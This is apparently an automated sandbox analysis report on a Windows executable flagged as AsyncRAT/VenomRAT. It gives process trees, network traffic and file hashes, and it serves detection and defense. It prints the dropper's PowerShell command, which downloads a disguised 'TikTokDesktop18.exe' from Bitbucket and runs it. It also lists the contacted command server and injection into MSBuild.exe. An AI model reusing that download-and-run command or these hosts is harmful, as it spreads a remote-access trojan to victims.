Malware Analysis Report

2025-01-02 06:54

Sample ID 241128-1wjnysxqfp
Target 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe
SHA256 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1
Tags
discovery execution asyncrat venomrat default rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1

Threat Level: Known bad

The file 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe was found to be: Known bad.

Malicious Activity Summary

discovery execution asyncrat venomrat default rat

AsyncRat

Asyncrat family

VenomRAT

Venomrat family

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Command and Scripting Interpreter: PowerShell

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-28 21:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-28 21:59

Reported

2024-11-28 22:01

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe

"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\141D.tmp\141E.tmp\141F.bat C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;

Network

Country Destination Domain Proto
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.23:443 bitbucket.org tcp
IE 185.166.142.23:443 bitbucket.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\141D.tmp\141E.tmp\141F.bat

MD5 1904675eec0f302424c4bde0956dab54
SHA1 267c3174e35e0e2a7d104f98b3326f313f2e464e
SHA256 45fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6
SHA512 fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3

memory/2720-6-0x000007FEF646E000-0x000007FEF646F000-memory.dmp

memory/2720-7-0x000000001B700000-0x000000001B9E2000-memory.dmp

memory/2720-9-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

memory/2720-8-0x0000000001DB0000-0x0000000001DB8000-memory.dmp

memory/2720-10-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

memory/2720-11-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

memory/2720-12-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-28 21:59

Reported

2024-11-28 22:02

Platform

win10v2004-20241007-en

Max time kernel

102s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

VenomRAT

rat
Description Indicator Process Target
N/A N/A N/A N/A

Venomrat family

venomrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2080 set thread context of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1428 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe C:\Windows\system32\cmd.exe
PID 1428 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe C:\Windows\system32\cmd.exe
PID 436 wrote to memory of 4408 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 436 wrote to memory of 4408 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 436 wrote to memory of 3680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 436 wrote to memory of 3680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3680 wrote to memory of 2080 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe
PID 3680 wrote to memory of 2080 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe
PID 3680 wrote to memory of 2080 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Processes

C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe

"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A894.tmp\A895.tmp\A896.bat C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;

C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe

C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe ;

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.23:443 bitbucket.org tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 16.15.178.155:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 23.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 155.178.15.16.in-addr.arpa udp
RU 212.15.49.155:4449 N/A tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
RU 212.15.49.155:4449 N/A tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
RU 212.15.49.155:4449 N/A tcp
RU 212.15.49.155:4449 N/A tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
RU 212.15.49.155:4449 N/A tcp

Files

C:\Users\Admin\AppData\Local\Temp\A894.tmp\A895.tmp\A896.bat

MD5 1904675eec0f302424c4bde0956dab54
SHA1 267c3174e35e0e2a7d104f98b3326f313f2e464e
SHA256 45fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6
SHA512 fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3

memory/4408-2-0x00007FFE71FB3000-0x00007FFE71FB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_snvlrfet.khw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4408-8-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp

memory/4408-13-0x00000220FF450000-0x00000220FF472000-memory.dmp

memory/4408-14-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp

memory/4408-18-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe

MD5 e619fff5751a713cf445da24a7a12c94
SHA1 9fc67a572c69158541aaaab0264607ada70a408c
SHA256 11fbd295494309d56d775a11f805544737ce71d058a716194c0fd5b800cdc6d9
SHA512 07420c9a0336ae350567abf68d7f5ef52b34c4c010dbabae6693bf27fd5a50a8b2b16696a3bed7bdc846d542eb04ce6102d5387484f352f9d09c8789ccfcd9ae

memory/2080-22-0x000000007411E000-0x000000007411F000-memory.dmp

memory/2080-23-0x00000000005C0000-0x0000000000646000-memory.dmp

memory/2080-24-0x0000000002950000-0x0000000002956000-memory.dmp

memory/2080-25-0x000000000ABE0000-0x000000000B10C000-memory.dmp

C:\Users\Admin\AppData\Roaming\gdi32.dll

MD5 8d662564d514751028c65d96c696271f
SHA1 8e27943b7b901a808d39a7ee6977e1d3769a15fb
SHA256 86af5d6ee9d824ec2dfa73f44b9ae285d33e9748a8b6dbd4333d1ae06cf6f72b
SHA512 0a5460bbe7f43db560a08e508381613098a28de208a9d85c9c41fffa62b1e0299389a575dfa2b78767d3dd0fc73f0c88677ca32d7fe4e87698def1386cf35bef

memory/4500-32-0x0000000000780000-0x00000000007AC000-memory.dmp

memory/4500-34-0x0000000005670000-0x0000000005C14000-memory.dmp

memory/4500-36-0x0000000005370000-0x0000000005402000-memory.dmp

memory/4500-37-0x0000000005350000-0x000000000535A000-memory.dmp